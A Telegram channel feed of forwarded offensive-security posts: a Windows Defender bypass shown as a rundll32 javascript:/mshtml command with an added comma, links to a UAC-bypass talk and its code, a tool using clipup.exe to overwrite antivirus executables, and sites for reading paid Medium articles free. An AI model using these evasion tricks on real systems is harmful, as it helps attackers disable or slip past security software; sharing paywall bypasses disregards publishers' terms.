Forwarded from Proxy Bar
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
*
то есть было и пофиксили:
магия запятой:
собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass. *
то есть было и пофиксили:
C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)магия запятой:
C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
👍4
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
A little lifehack if you, like me, come across paid articles from Medium. These sites allow you to read paid Medium articles for free:
🔗 https://freedium.cfd/<URL>
🔗 https://medium-forall.vercel.app/
#medium #premium #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10
Forwarded from APT
⚙️From COM Object Fundamentals To UAC Bypasses
A 25-minute crash course covering Tokens, Privileges, UAC, COM, and ultimately bypassing UAC.
🔗Research:
https://www.youtube.com/watch?v=481SI_HWlLs
🔗Source:
https://github.com/tijme/conferences/tree/master/2024-09%20OrangeCon/code
#windows #com #uac #bypass
A 25-minute crash course covering Tokens, Privileges, UAC, COM, and ultimately bypassing UAC.
🔗Research:
https://www.youtube.com/watch?v=481SI_HWlLs
🔗Source:
https://github.com/tijme/conferences/tree/master/2024-09%20OrangeCon/code
#windows #com #uac #bypass
YouTube
From COM Object Fundamentals To UAC Bypasses - Tijme Gommers
Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.
👍5❤4👎1👾1
Forwarded from APT
🛡CreateProcessAsPPL
This is a utility for running processes with Protected Process Light (PPL) protection, enabling bypass of EDR/AV solution defensive mechanisms. It leverages legitimate Windows clipup.exe functionality from System32 to create protected processes that can overwrite antivirus service executable files.
🔗 Source:
https://github.com/2x7EQ13/CreateProcessAsPPL
#av #edr #bypass #ppl
This is a utility for running processes with Protected Process Light (PPL) protection, enabling bypass of EDR/AV solution defensive mechanisms. It leverages legitimate Windows clipup.exe functionality from System32 to create protected processes that can overwrite antivirus service executable files.
🔗 Source:
https://github.com/2x7EQ13/CreateProcessAsPPL
#av #edr #bypass #ppl
❤4